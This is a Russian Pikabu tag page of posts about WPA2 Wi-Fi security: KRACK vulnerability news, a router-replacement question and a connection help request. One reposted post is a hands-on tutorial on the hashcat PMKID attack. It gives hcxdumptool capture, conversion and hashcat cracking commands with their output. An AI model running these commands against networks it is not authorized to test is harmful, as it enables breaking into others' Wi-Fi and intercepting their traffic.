Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Регистрируясь, я даю согласие на обработку данных и условия почтовых рассылок.
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр Ищите предметы среди очаровательных жителей и уютных домиков!

Потеряшки - поиск предметов

Головоломки, Казуальные, Детские

Играть

Топ прошлой недели

  • solenakrivetka solenakrivetka 7 постов
  • Animalrescueed Animalrescueed 53 поста
  • ia.panorama ia.panorama 12 постов
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая «Подписаться», я даю согласие на обработку данных и условия почтовых рассылок.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Маркет Промокоды Пятерочка Промокоды Aroma Butik Промокоды Яндекс Путешествия Промокоды Яндекс Еда Постила Футбол сегодня
0 просмотренных постов скрыто
Kyllerian
Kyllerian

Wpa enterprise⁠⁠

7 лет назад

Ноутбук на windows 10 pro. При попытке подключения к сети wpa2enterprise (сеть вуза) пишет "невозможно подключиться к сети". Кто-нибудь знает решение проблемы?

[моё] Wpa2 ЮФУ Мехмат Ноутбук Windows 10 Wi-Fi Без рейтинга Текст
15
227
gentux
gentux

Новая техника атаки WPA2, не требующая наличия клиента на AP⁠⁠

7 лет назад

Участниками проекта hashcat обнаружен новый вектор атаки на беспроводной стандарт WPA2, не требующий классического перехвата "рукопожатия" доступа клиент-точка. Данная уязвимость выявлена в рамках исследования потенциальных проблем безопасности нового протокола WPA3.


Основное отличие от существующих атак заключается в том, что в этой атаке захват полного 4-стороннего рукопожатия EAPOL не требуется. Новая атака выполняется в RSN IE (Robust Security Network Information Element), и для ее успешного воспроизведения достаточно одного кадра EAPOL.


В настоящее время не известно, для какого количества маршрутизаторов этот метод будет работать, — вероятнее всего, для всех существующих сетей 802.11i /p/q/r с включенными функциями роуминга, а это большинство современных маршрутизаторов.


Основные особенности новой атаки:


нет необходимости ждать клиентов — атакуется напрямую AP;

нет необходимости ждать полного 4-стороннего «рукопожатия» между клиентом и AP;

отсутствие ретрансмиссии кадров EAPOL;

исключает вероятность захвата неверных паролей от клиента;

исключены потери кадров EAPOL при отдалении/потери связи с клиентом;

высокая скорость, обусловленная отсутствием необходимости фиксировать значения nonce и replaycounter;

нет необходимости в специализированном формате выходных данных (pcap, hccapx и т. д.) — захваченные данные хранятся в виде hex-строки.


Детали атаки


RSN IE — это необязательное поле, которое можно найти в рамках управления 802.11. Одной из возможностей RSN является PMKID.

PMKID вычисляется с использованием HMAC-SHA1, где ключ является PMK, а часть данных представляет собой конкатенацию фиксированной строковой метки «PMK Name», MAC-адрес точки доступа и MAC-адрес станции.

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Поскольку PMK такой же, как в обычном четырехстороннем рукопожатии EAPOL, это идеальный вектор атаки. Мы получаем все необходимые данные в первом кадре EAPOL из AP.


Для атаки потребуются следующие инструменты (актуальные версии):


hcxdumptool

hcxtools

hashcat


Запускаем hcxdumptool для "снятия" PMKID:

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

Об успешном завершении атаки (средняя продолжительность 10 минут) уведомит надпись FOUND PMKID:

[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

После чего необходимо сконвертировать полученные данные:

$ ./hcxpcaptool -z test.16800 test.pcapng
start reading from test.pcapng
summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 1
1 PMKID(s) written to test.16800

которые после конвертации примут следующий вид:

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

представляющие из себя hex-значения следующих типов данных:

PMKID*MAC AP*MAC Station*ESSID

Далее остается "скормить" полученные результаты утилите hashcat (да, без брута пока никуда) и ждать результат:

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

Данная техника значительно упрощает и ускоряет атаку на большинство беспроводных устройств благодаря меньшему количеству факторов влияния.

Взято отсюда.

Оригинал.

Показать полностью 1
Wpa2 Взлом Hashcat Eapol Pmkid Длиннопост Habr
33
20
KotBezSapogov
KotBezSapogov
Информационная безопасность IT

Eще раз про уязвимость wpa2 - о замене старого роутера⁠⁠

8 лет назад

Понимаю что эта тема уже месячной давности,но вот хотелось прояснить вопрос, а надо ли менять сам роутер?

Узнав о уязвимости wpa2 ,которая krack,я задался вопросом замены маршрутизатора,который с 2013 года служит мне верой и правдой.Речь пойдет о keenetikc первого поколения, те что в белом корпусе.На данный момент  обслуживание этой модели  приостановлено и самая "свежая" прошивка датируется 2015 годом.Но поскольку внутри меня поселилась какая то крохотная надежда что может быть они заделают эту дыру,я задал вопрос в техподдержку Zyxel. Ниже приведу текст письма:


"Именно для моделей первого поколения (в белом корпусе) обновление не планируется выпускать, т.к. эти модели уже сняты с обслуживания.

К обновлению рекомендуются только устройства в которых используется один из режимов клиента — Wireless ISP (WISP), Wireless Client, Адаптер, Усилитель/Повторитель.

Про уязвимость KRACK у нас есть информация на сайте "Защита от уязвимости WPA2 KRACK"

Самое важное, что KRACK-атаке подвержены именно клиентские устройства, подключенные к точке доступа, а не сам роутер.

Если вы используете интернет-центр в обычном режиме с точкой доступа, то и обновлять его нет необходимости, и беспокоится не зачем.

Для защиты беспроводной сети прежде всего нужно обязательно установить последние обновления на клиентские устройства (смартфоны, планшеты, ноутбуки)."


То есть,собственно, сам роутер обновлять или менять нужно, если он используется как, например, репитер сигнала,клиент.

Показать полностью
[моё] Wpa2 Krack Роутер Уязвимость Zyxel Текст
33
254
pravil
pravil
Информационная безопасность IT

Протокол WPA2 удалось взломать⁠⁠

8 лет назад

Команде из www.krackattacks.com удалось провести атаку MITM используя WPA2, который используется с 2006 года. Некоторый вендоры, такие как Mikrotik, уже выпустили обновления.

"Сломан" механизм 4-х кратного рукопожатия при установлении защищённого соединения посредством WPA2. Атаке более подвержены устройства с ОС Android и Linux. Уже подготовили ветку на github, но пока она ещё пустая https://github.com/vanhoefm/krackattacks.

Вся подробная информация у них на сайте www.krackattacks.com.

Уязвимость устраняется только обновлением/патчем.

Информационная безопасность Wpa2 Wi-Fi Текст
40
4
Inok1980

Обнаружена уязвимость WI FI (WPA2).⁠⁠

8 лет назад

Группа исследователей ( https://www.krackattacks.com/ ) обнаружила серьезную уязвимость в защищенном протоколе передачи данных WPA2, который используется в большинстве современных беспроводных сетей WiFi. Злоумышленники с помощью «атак с переустановкой пароля» (KRACK) могут не только перехватывать зашифрованные данные устройств, но и внедрять на них вирусы и черви, пишут исследователи. Смена пароля сети никак не затрудняет атаку.

Подразделение министерства национальной безопасности США по противодействию киберугрозам (US-CERT) подтвердило реальность и серьезность уязвимостей. «Обращаем внимание, что уязвимость на уровне протокола подразумевает уязвимость всех его корректных реализаций», - говорится в заявлении US-CERT.


Группа также подчеркивает, что уязвимость присуща не конкретной сети, а самому стандарту WiFi, поэтому до выхода заплаток, закрывающих эту дыру, уязвимыми оказываются все такие устройства. В частности, это сети, построенные на ОС Windows, iOS, Android, Linuх, а также ОС коммуникационного оборудования и WiFi-роутеров. Результаты исследования будут представлены на международной конференции по компьютерной безопасности CCS 1 ноября.

Порок WPA2, который могут использовать хакеры, проявляется на этапе проверки пароля WiFi. Полная надежность идеально реализованного протокола с «четырехсторонним рукопожатием», к которым относится и WPA2, доказана математически, пишут авторы. Но его текущая реализация позволяет KRACK подменить ключи шифрования сессии на третьем этапе соединения точки доступа с клиентским устройством. Затем хакеры могут полностью или частично расшифровать трафик и получить доступ к паролям, личным данным, а также контроль над устройством. Обычный пользователь никак не сможет распознать угрозу.


Оригинал https://www.vedomosti.ru/technology/articles/2017/10/16/7380...

Коммент для минусов внутри.


От себя: Пока не закрыта уязвимость. Необходимо использовать протоколы https, VPN с шифрованием, мессенжеры основные и так шифруются. Осторожно использовать обычный http и почтовые клиенты где нет шифрования.

Показать полностью
Wi-Fi Wpa2 Уязвимость Linux Android Текст
16
daivertula
daivertula

Исследователи рассказали об уязвимости в самом распространённом протоколе защиты Wi-Fi⁠⁠

8 лет назад

Брешь в безопасности WPA2 позволяет перехватывать данные пользователей.

Группа исследователей в области информационной безопасности из Лёвенского католического университета в Бельгии обнаружила критическую уязвимость в протоколе шифрования W-Fi-сетей WPA2, который является самым распространённым алгоритмом защиты современных сетей Wi-Fi. Уязвимость получила название KRACK (Key Reinstallation Attacks).


Обнаруженная «лазейка» позволяет злоумышленникам прослушивать трафик со всех устройств, подключенных к Wi-Fi: ноутбуков, планшетов, смартфонов. Хакеры могут получить доступ ко всем данным, которые передаются через устройства, подключенные к Wi-Fi, если информация не зашифрована дополнительно. Речь идёт о номерах кредитных карт, логинах и паролях, переписке пользователей, пересылаемых фото и видео и так далее, рассказал руководитель группы Мэти Ванхоф (Mathy Vanhoef).


Ванхоф подчеркнул, что проблема найдена в самом протоколе WPA2, а не в отдельных устройствах, то есть уязвимость может затронуть всех пользователей Wi-Fi. Но «лазейка» работает лишь при условии, что взломщик находится в зоне действия сети жертвы.


Кто может пострадать


Взломать можно любое устройство, подключенное к Wi-Fi. Атаке подвержены все операционные системы: Android, iOS, Windows и другие. Однако в наивысшей зоне риска находятся некоторые версии Linux, а для устройств под управлением Android 6.0 и старше (ниже) уязвимость «чрезвычайно разрушительна». В Google заявили, что в курсе проблемы и что в ближайшие недели выпустят исправления для всех уязвимых устройств.


При атаке на другие платформы сложнее расшифровать все пакеты данных, но тем не менее, злоумышленники могут получить наибольшую часть сведений, предупредили эксперты.

Демонстрация атаки на Android-смартфон

Ванхофу и его коллегам не удалось выяснить, использовали ли хакеры когда-либо найденную уязвимость. Он отметил, что в июле 2017 года его группа предупредила производителей и продавцов оборудования, которое может быть затронуто. В конце августа предупреждения разослала также организация US-CERT — одно из подразделений Министерства внутренней безопасности США. Письмо получили примерно 100 компаний, пишет Ars Technica.


Уязвимость позволяет перехватить TCP-соединения, расшифровать передаваемые пакеты информации, данные HTTP и так далее, предупредили в US-CERT. «Обратите внимание, что проблема обнаружена на уровне протокола, а значит, затрагивает большинство или все имплементации стандарта WPA2», — говорится в письме.


Раскрыть детали уязвимости US-CERT и исследователи из Лёвенского университета обещали во второй половине 16 октября. Информация будет опубликована на специальном сайте, посвящённом KRACK, а также на странице в GutHub.


Что делать


Смена пароля на Wi-Fi-сети не поможет избежать атаки, говорит Ванхоф. Вместо этого он советует убедиться, что на маршрутизаторе стоит последняя версия прошивки, и обновить все пользовательские устройства. После этого можно в качестве дополнительной меры поменять пароль для сети.


Если речь идёт о корпоративной сети, то для предотвращения атаки каждый её пользователь также должен обновить своё устройство.


Чтобы получить дополнительную информацию об уязвимости и обновлениях для маршрутизаторов, Ванхоф рекомендует обратиться к своему поставщику оборудования. При этом он призывает всех продолжать пользоваться WPA2 и не возвращаться на протокол WEP.


Ars Technica рекомендует пользователям избегать подключения к Wi-Fi до выпуска патча, либо использовать HTTPS, STARTTLS, Secure Shell и другие протоколы шифрования передаваемого трафика. В качестве дополнительной меры безопасности можно использовать и VPN-сети, но к их выбору также стоит подходить осторожно, поскольку многие из них не могут гарантировать более безопасное подключение, пишет издание.


Наиболее уязвимой может оказаться критически важная корпоративная информация, заявил в разговоре с vc.ru директор направления облачных сервисов «1С-Битрикс» Александр Демидов.

Главный технический директор сервиса подписки Iron Group Алекс Хадсон призвал сохранять спокойствие. Он отметил, что при открытии сайтов с поддержкой HTTPS данные пользователя остаются в безопасности, поскольку браузер в таком случае полагается не только на алгоритмы шифрования WPA2. Кроме того, подчеркнул Хадсон, для взлома злоумышленник должен находиться неподалёку от жертвы: «Вы не стали вдруг уязвимыми для всех в интернете. Очень слабая защита, но важно учитывать этот факт при анализе уровня угрозы».


Пруф. https://vc.ru/27592-issledovateli-rasskazali-ob-uyazvimosti-...

Показать полностью 1 1
Wpa2 Wi-Fi Взлом Видео Длиннопост
10
8
Skar404
Skar404

Вы уверенны что ваш WiFi-роутер под зашитой?⁠⁠

11 лет назад
Вы уверенны что ваш WiFi-роутер под зашитой?
Показать полностью 1
[моё] Wi-Fi Моё Opn Wep Wpa Wpa2 Mac Защита Длиннопост
45
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Маркет Промокоды Пятерочка Промокоды Aroma Butik Промокоды Яндекс Путешествия Промокоды Яндекс Еда Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии